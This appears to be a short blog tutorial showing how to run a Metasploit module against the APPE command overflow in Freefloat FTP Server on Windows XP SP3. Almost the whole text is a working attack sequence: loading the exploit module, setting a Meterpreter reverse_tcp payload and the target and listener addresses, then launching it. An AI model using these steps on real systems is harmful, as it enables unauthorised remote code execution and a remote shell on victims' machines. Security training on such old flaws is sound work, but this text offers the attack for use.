Freefloat FTP Server APPE Command Overflow in Metasploit

The Freefloat FTP Server APPE Command Overflow is not a 0-day exploit but lemme just share to you a Metasploit Module made by SecPod.

In order to run the module we need to download the ruby script first and put it in this directory : /opt/framework/msf3/modules/exploits/windows/ftp


For those of you who don’t know, this kind of exploit works on a Windows XP SP3 that has a Freefloat FTP server. It exploits the “validation errors while processing DELE,MDTM, RETR, RMD, RNFR, RNTO, STOU, STOR, SIZE, APPE, STAT commands“.  If the exploit is successful, it allows the remote attacker to execute arbitrary code or may cause a dos attack.


Alright, fire up metasploit (msfconsole) and use this exploit:

use exploit/windows/ftp/freefloat_ftp_apee_cmd

To know more about this exploit you may type, info <exploitname>.


Set the payload:

set payload windows/meterpreter/reverse_tcp

Assuming we have a Freefloat FTP Server on a Windows XP SP3 and its IP is, thus we need to set the RHOST to the IP it is assigned to.

set rhost

Then set the attacker host, mine is

set lhost

Then to assign a port that handles the payload, you may set by typing:

set lport <port>  (For example: set lport 445)

It’s up to you if you want to change the listening address but the default port is 4444. So if all settings are done, then you may run the command exploit.

exploit freefloat Metasploit


If you are new to metasploit then you might want to read my Metasploit Basics article.

Leave a Reply